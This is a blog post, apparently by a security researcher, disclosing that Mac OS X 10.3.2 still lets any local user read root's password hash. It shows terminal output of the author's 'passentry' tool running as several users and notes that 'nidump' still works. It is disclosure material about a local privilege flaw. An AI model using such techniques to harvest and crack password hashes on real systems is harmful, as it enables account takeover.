As I reported back in September, MacOS X would blindly give any user access to any other user’s crypt’d password hash.

This made it quite trivial for any user to run one of the many ‘crack’ programs in a brute-force attempt to obtain access as other users. For obvious reasons this is bad, as MacOS X is quite capable of acting as a server!

I decided upon a whim to test my ‘passentry’ (code available within the article linked above, or here) against 10.3.2. Guess what? It doesn’t work for ‘normal’ users anymore, but DOES still work to obtain the password hash for ‘root’, as ANY user!

6:24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%make cc passentry.c -o passentry 6:24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo ./passentry shawn DEBUG: I’m running UID 501, EUID 501. // Just me! I can read user shawn’s password hash, it’s ’********’. :24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo ./passentry root DEBUG: I’m running UID 0, EUID 0. // So, I’m root. This is fine I can read user root’s password hash, it’s ‘REMOVED’. 6:25 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo -u shawn ./passentry root DEBUG: I’m running UID 501, EUID 501. // Me again. I can read user root’s password hash, it’s ‘REMOVED’. 6:25 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo -u nobody ./passentry root DEBUG: I’m running UID -2, EUID -2. // nobody I can read user root’s password hash, it’s ‘REMOVED’.

You can see that when I attempted to obtain my personal password, it did not work. It returned me a bogus string. Even when executing as root. Oddly, the converse, running as any user (myself), I am able to obtain root’s.

I’m glad that they fixed part this oversight; but I’m a bit annoyed that this still works for root, and the implication, of course, means that any user can still run ‘nidump’.